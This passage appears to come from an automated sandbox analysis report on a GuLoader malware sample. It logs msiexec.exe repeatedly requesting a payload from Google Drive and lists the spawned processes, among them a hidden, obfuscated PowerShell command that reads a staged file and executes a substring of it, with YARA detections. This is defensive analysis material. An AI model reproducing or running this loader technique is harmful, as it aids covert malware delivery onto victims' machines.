                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                        17         | 192.168.2.4 | 49737       | 142.250.185.193 | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:37 UTC | 470 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:38 UTC | 1534 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIuNwpgJXkb925lt9bAaJn-vUWDMXE4svscOc1746wY98sbh_s2h8nCf4uNKelxuR8Uj
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:37 GMT
                                                                        Content-Security-Policy: script-src 'nonce-mE0d6xhnKeeJk3E3M0ASRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:38 UTC | 1534 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 48 7a 6c 62 51 71 69 5a 78 4b 35 74 6b 56 68 30 59 51 65 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8HzlbQqiZxK5tkVh0YQeLQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:38 UTC | 118 | IN | Data Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        18         | 192.168.2.4 | 49738       | 216.58.206.78  | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:41 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:43 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:42 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-CYkNgdt7uB_n2mQwfcZCiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                        19         | 192.168.2.4 | 49739       | 142.250.185.193 | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:45 UTC | 470 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:46 UTC | 1534 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIv15-NRjJR3BIyRs6pF_7U5SaxGjedX1GDvVZU7YiFslTeq-Fc3E03O_CYZJAQUhVhC
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:46 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-9P5cL0hea1LIuPxPmtfhnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:46 UTC | 1534 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 4c 35 56 6c 78 67 39 58 35 6a 64 34 34 37 4c 74 74 6c 31 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6L5Vlxg9X5jd447Lttl1ZA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:46 UTC | 118 | IN | Data Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        20         | 192.168.2.4 | 49740       | 216.58.206.78  | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:48 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:49 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:49 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-b95Ej6AElYJtRqkn6bdiDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Target ID:0
                                                                        Start time:16:45:43
                                                                        Start date:07/03/2025
                                                                        Path:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\GyGE2VaBFL.exe"
                                                                        Imagebase:0x400000
                                                                        File size:791'053 bytes
                                                                        MD5 hash:D8EACF83CA07943696BF5E23528CC348
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:16:45:45
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "
                                                                        Imagebase:0xb80000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1676887865.000000000ACA8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:16:45:45
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff62fc20000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:16:45:47
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff6ca680000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:10
                                                                        Start time:16:46:33
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                        Imagebase:0xcc0000
                                                                        File size:59'904 bytes
                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2415295376.0000000005518000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false
